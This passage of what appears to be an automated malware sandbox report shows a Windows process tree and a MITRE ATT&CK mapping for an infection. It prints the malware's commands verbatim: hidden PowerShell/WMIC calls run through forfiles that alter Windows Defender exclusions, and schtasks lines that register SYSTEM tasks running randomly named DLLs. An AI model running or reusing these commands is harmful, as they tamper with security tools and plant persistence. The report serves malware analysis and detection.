                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                          PID:6360
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                              PID:1048
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "bbpyUPajliEPwEthVj"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:820
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:6536
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                            PID:428
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:2956
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                  PID:1520
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                      PID:6416
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jgfFqNDpU\dEGFfu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VEAzSIXLFiThbrV" /V1 /F
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                              PID:1764
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "VEAzSIXLFiThbrV2" /F /xml "C:\Program Files (x86)\jgfFqNDpU\yqLowuq.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                              PID:4660
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /END /TN "VEAzSIXLFiThbrV"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:6496
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "VEAzSIXLFiThbrV"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:2692
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "aYPRkpMDHXlbJi" /F /xml "C:\Program Files (x86)\KzDHahyhCgTU2\ylTnfkI.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                  PID:896
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "ahvrAEKShtLbT2" /F /xml "C:\ProgramData\bTzCNmotopxUflVB\hAWBmLM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                  PID:6636
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "SPlsdEQQjqGSpkezo2" /F /xml "C:\Program Files (x86)\DfohqrWuQwzjvvzxRXR\mxwVKaz.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                  PID:6740
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "NNIqQTJdgKOdXHcJfKt2" /F /xml "C:\Program Files (x86)\tGUMufluaQZXC\ceKhAZg.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                  PID:4200
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "SelpCfmmUYUFJhyKK" /SC once /ST 13:51:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kDKKovSdrktZBFxZ\dbwhhYPc\LSanXnh.dll\",#1 /VdidZTi 385104" /V1 /F
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                  PID:5972
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                  schtasks /run /I /tn "SelpCfmmUYUFJhyKK"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:2660
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    schtasks /CREATE /TN "Qburb1" /SC once /ST 02:53:31 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                    PID:6784
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    schtasks /run /I /tn "Qburb1"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "Qburb1"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:848
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "PUMkfLMhQCQOejXrQ"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:5476
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 2332
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                          PID:6380
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4940 -ip 4940
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:7160
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:5664
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:1440
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kDKKovSdrktZBFxZ\dbwhhYPc\LSanXnh.dll",#1 /VdidZTi 385104
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:5956
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kDKKovSdrktZBFxZ\dbwhhYPc\LSanXnh.dll",#1 /VdidZTi 385104
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:6956
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "SelpCfmmUYUFJhyKK"
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3576
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6160
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x110,0x114,0x118,0xe0,0xe4,0x7ffb40ac3cb8,0x7ffb40ac3cc8,0x7ffb40ac3cd8
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4384
                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1812 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3092
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2736
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6948
                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4736
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6328
                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:676
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:896
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1996 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6312
                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:6132
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6756
                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,8783113527600523488,6681158094710945457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6012 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5556
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                              werfault.exe /h /shared Global\128b1959d91c4b24a8a1ff05add3d2ff /t 2012 /p 5156
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5756
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5140 -ip 5140
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6340
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6880 -ip 6880
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5636
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:3532
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3776

                                                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                      Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                      Resource Development

                                                                                                                                                                                                                                                                                                                                                                                      Initial Access

                                                                                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                                                                                      Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                      T1059

                                                                                                                                                                                                                                                                                                                                                                                      PowerShell

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1059.001

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053.005

                                                                                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                      T1547

                                                                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1547.001

                                                                                                                                                                                                                                                                                                                                                                                      Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1547.004

                                                                                                                                                                                                                                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1543

                                                                                                                                                                                                                                                                                                                                                                                      Windows Service

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1543.003

                                                                                                                                                                                                                                                                                                                                                                                      Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                      T1546

                                                                                                                                                                                                                                                                                                                                                                                      Component Object Model Hijacking

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1546.015

                                                                                                                                                                                                                                                                                                                                                                                      Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1546.007

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053.005

                                                                                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                      Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1548

                                                                                                                                                                                                                                                                                                                                                                                      Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1548.002

                                                                                                                                                                                                                                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                      T1547

                                                                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1547.001

                                                                                                                                                                                                                                                                                                                                                                                      Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1547.004

                                                                                                                                                                                                                                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1543

                                                                                                                                                                                                                                                                                                                                                                                      Windows Service

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1543.003

                                                                                                                                                                                                                                                                                                                                                                                      Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                      T1546

                                                                                                                                                                                                                                                                                                                                                                                      Component Object Model Hijacking

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1546.015

                                                                                                                                                                                                                                                                                                                                                                                      Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1546.007

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1053.005

                                                                                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                      Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1548

                                                                                                                                                                                                                                                                                                                                                                                      Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1548.002

                                                                                                                                                                                                                                                                                                                                                                                      File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                                                                                                                                                                      Hide Artifacts

                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                      T1564

                                                                                                                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                      T1564.001

                                                                                                                                                                                                                                                                                                                                                                                      Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                                                                                                                                      T1562

                                                                                                                                                                                                                                                                                                                                                                                      Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1562.004

                                                                                                                                                                                                                                                                                                                                                                                      Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                      T1562.001

                                                                                                                                                                                                                                                                                                                                                                                      Indirect Command Execution

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1202

                                                                                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                      9
                                                                                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                                                                                      Obfuscated Files or Information

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1027

                                                                                                                                                                                                                                                                                                                                                                                      Command Obfuscation

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1027.010

                                                                                                                                                                                                                                                                                                                                                                                      Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1553

                                                                                                                                                                                                                                                                                                                                                                                      SIP and Trust Provider Hijacking

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1553.003

                                                                                                                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                                                                                                                      Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1555

                                                                                                                                                                                                                                                                                                                                                                                      Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1555.003

                                                                                                                                                                                                                                                                                                                                                                                      Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1552

                                                                                                                                                                                                                                                                                                                                                                                      Credentials In Files

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1552.001

                                                                                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                                                                                      Browser Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                      T1217

                                                                                                                                                                                                                                                                                                                                                                                      Password Policy Discovery

